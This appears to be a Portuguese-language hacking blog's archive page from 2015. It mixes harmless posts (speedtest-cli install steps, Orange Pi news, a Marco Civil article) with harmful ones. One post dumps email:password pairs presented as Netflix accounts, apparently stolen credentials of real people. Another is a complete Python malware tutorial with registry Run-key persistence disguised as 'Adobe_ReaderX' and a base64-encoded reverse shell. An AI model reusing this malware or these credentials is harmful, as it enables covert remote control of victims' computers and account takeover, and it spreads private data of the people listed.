http://skamason.com/7b9R

http://skamason.com/7b9R

domingo, 18 de outubro de 2015

Bypass Ftp Login No Wordpress

Hello Hackers.

Whats Up ?

Hoje Irei Ensinar a Vocês Como Contornar Quando o Ftp Login Esta Ativo No Wordpress.

Até a Próxima.

NeoInvasorBCA



quinta-feira, 1 de outubro de 2015

Contas Netflix.




Hello Warrios.. Para Compensar Minha Ausência.. Deixo Algumas Contas Netflix Para Vocês.. Até o Proximo Post.. 

caroblondy@yahoo.fr:blonde
cecile_leduc@hotmail.com:mercredi
ceddelobelle@gmail.com:Aurelie280486
cedric.monperrus@free.fr:dgn8vsj3
cedricaleka@hotmail.com:microsoft
charlesd.l@hotmail.com:ak-475d7
chaynnas@aliceadsl.fr:kallan
chiasson93@gmail.com:nintendo1
chloe.mehl@hotmail.fr:cassis
chonny62@hotmail.com:rool62
christian_marcil@hotmail.com:a49301600
christolefebvre@hotmail.com:christo11
chtourou.ahmed@gmail.com:Vetca22

segunda-feira, 28 de setembro de 2015

SSH BruteForce




Ataques de força bruta trabalhar calculando todas as combinações possíveis que poderia tornar-se uma senha e testá-lo para ver se ele é a senha correta. Ataques de força bruta em senhas são garantia de sucesso. A única questão é quanto tempo o ataque de força bruta vai demorar para encontrar a senha correta. À medida que aumenta o comprimento da senha, a quantidade de tempo, em média, para encontrar os aumentos senha correta exponencialmente. Isto significa senhas curtas normalmente pode ser descoberto muito rapidamente, mas senhas mais longas podem levar décadas.


sábado, 19 de setembro de 2015

Speedtest - Command Line Interface for Testing Internet Bandwidth


speedtest-cli is a command line interface for testing internet bandwidth using speedtest.net

Installation

pip / easy_install
pip install speedtest-cli
or
easy_install speedtest-cli

Github
pip install git+https://github.com/sivel/speedtest-cli.git
or
git clone https://github.com/sivel/speedtest-cli.git
python speedtest-cli/setup.py install

Just download (Like the way it used to be)
wget -O speedtest-cli https://raw.githubusercontent.co
m/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli
or
curl -Lo speedtest-cli https://raw.githubuser
content.com/sivel/speedtest-cli/master/speedtest_cli.py
chmod +x speedtest-cli

Usage

$ speedtest-cli -h
usage: speedtest-cli [-h] [--bytes] [--share] [--simple] [--list]
                     [--server SERVER] [--mini MINI] [--source SOURCE]
                     [--timeout TIMEOUT] [--version]

Command line interface for testing internet bandwidth using speedtest.net.
--------------------------------------------------------------------------
https://github.com/sivel/speedtest-cli

optional arguments:
  -h, --help         show this help message and exit
  --bytes            Display values in bytes instead of bits. Does not affect
                     the image generated by --share
  --share            Generate and provide a URL to the speedtest.net share
                     results image
  --simple           Suppress verbose output, only show basic information
  --list             Display a list of speedtest.net servers sorted by
                     distance
  --server SERVER    Specify a server ID to test against
  --mini MINI        URL of the Speedtest Mini server
  --source SOURCE    Source IP address to bind to
  --timeout TIMEOUT  HTTP timeout in seconds. Default 10
  --version          Show the version number and exit

terça-feira, 15 de setembro de 2015

Orange Pi


Orange Pi é o novo PI de $15

 

O Orange PI

Orange Pi é um concorrente direto e tem algumas variantes ao Raspberry Pi. Originalmente, a placa custa cerca de US$30, mas com WiFi, um processador de 1,6 GHz, 8 GB de flash, e uma interface SATA. Há agora uma versão reduzida do Orange Pi que está saindo por volta de $15, claro que sem flash, SATA e Wi-Fi e uma das 4 portas USB do originais. Ainda assim, o Raspberry Pi não possui um flash. E o Orange Pi de US$15 tem as coisas que você esperaria em um Pi (HDMI e Ethernet), juntamente com outros extras, como um receptor de IR e um microfone embutido. Nada mal por US$15 considerando que tem um processador quad-core, uma GPU e 1GB de RAM.
Orange Pi Mini 2
Orange Pi PC é compatível com os sistemas operacional destinados a seu irmão mais velho o Raspberry, para que possa executar Lubuntu, Android, Raspbian, e muito mais. Você pode encontrar alguns manuais e outras ferramentas de lá também. Claro, se você está procurando o apoio da comunidade, você provavelmente vai encontrar mais usuários do Raspberry Pi, em fóruns e projetos, pelo menos por agora.
Você pode ver o Debian rodando em um Orange Pi muito semelhante ao Raspi no vídeo abaixo. O hardware real usado é o Orange Pi Mini-2, que tem uma porta USB extra, mas é de outro modo praticamente idêntico ao PC.
Pessoalmente, se preciso de wifi no projeto, eu vou preferir gastar um pouco mais e obter o WiFi nativo. Mas se você não precisa de Wi-Fi, é difícil encontrar um PC de US$15 tão capaz quanto o Orange Pi.

sábado, 5 de setembro de 2015

0xC Python Tutorial: Python Malware

Malware


This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In a previous tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using PyInstaller.  Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:
One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”.  Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))
# Queries Windows registry for key values
# Appends autorun key to runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
# Set autorun key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell.  I leveraged a Python reverse shell released by TrustedSec and made one modification — Base64 encode the network traffic:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def shell():
#Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
if __name__ == "__main__":
        main()
Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud.  Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker.  You can notice the network traffic is base64 encoded:
malware
Here is the full code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))
# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
# If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
def shell():
#Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
if __name__ == "__main__":
        main()

quarta-feira, 19 de agosto de 2015

PL que ataca Marco Civil recebe parecer favorável na CCJ



PL que ataca Marco Civil recebe parecer favorável na CCJ
Menos de uma semana depois da Câmara dos Deputados aprovar a Lei Antiterrorismo enviada pela Executivo, legisladores brasileiros demonstram mais uma vez pouco interesse em defender a liberdade e a privacidade daqueles que representam. Parecer do deputado Juscelino Filho (PRP-MA) declarou ontem (18), na Comissão de Constituição e Justiça e de Cidadania (CCJC) da Câmara de Deputados, constitucional o substitutivo do Projeto de Lei 215/2015, do qual é relator, (o autor é o Deputado Hildo Rocha, PMDB-MA), que altera o Marco Civil da Internet, permitindo a “autoridades competentes” exigir sem autorização judicial prévia registros de conexão e acesso a provedores de serviço de internet e aplicações em caso de crimes contra a honra praticados na rede para instrução de inquéritos policiais e investigações. O substitutivo é resultante do apensamento dos PLs 1547/2015 (autoria de Expedito Netto, SD-RO) e 1589/2015 (autoria de Soraya Santos, PMDB-RJ).

A Lei 12.965/2014, o Marco Civil, não será a única legislação alterada caso o projeto seja aprovado. A pena para qualquer crime descrito no Código Penal poderá ser aumentada até o dobro se for cometido “por meio de aplicação de internet ou de dispositivo de informática e telemática”. Determina ainda que, neste caso, não será mais necessária prestação de queixa para procedimento. No que se refere ao Código de Processo Penal, propõe-se que crimes “por meio de aplicação de internet ou de dispositivo de informática ou telemática” sejam tornados inafiançáveis.
Também causa preocupação aos defensores da liberdade e da privacidade na internet, a possibilidade de inclusão no Marco Civil de um novo artigo, que dá licença ao Ministério Público e a autoridades policiais para “requerer, ao responsável pela guarda, registros de conexão e registros de acesso à aplicação, para instruir inquérito policial ou procedimento investigatório instaurado para apurar a prática de crimes contra a honra praticado por meio de aplicação de internet ou de dispositivo de informática ou telemática”. O Marco Civil afirma que estes registros só podem ser obtidos com autorização judicial.
Aprovado há pouco mais de um ano, o Marco Civil fez o Brasil se tornar referência mundial em termos de governança da internet. Parte significativa dos integrantes da sociedade civil mobilizados em torno da produção e aprovação da lei consideram,. de todas as partes que o compõem, as seções que dizem respeito à guarda de registros as mais lenientes. O PL 215/2015 aproveita-se deste atributo para fragilizar a privacidade de milhões de usuários da internet no Brasil.

Além disto, dispensar a prestação de queixa para que sejam punidos crimes cometidos na internet é torná-los passíveis de perseguição por ação pública. Em outras palavras, no caso de crimes contra a honra praticados na rede, por exemplo, o autor da ação passa a ser o Ministério Público e não mais a vítima (ação privada, categoria na qual se enquandra atualmente qualquer crime contra a honra). O projeto segue agora para o plenário da Comissão de Constituição, Justiça e Cidadania (CCJC) da Câmara dos Deputados, no qual será avaliada sua constitucionalidade.


Íntegra do substitutivo em: http://www.camara.gov.br/proposicoesWeb/prop_mostrarintegra?codteor=1367703&filename=PRL+2+CCJC+=%3E+PL+215/2015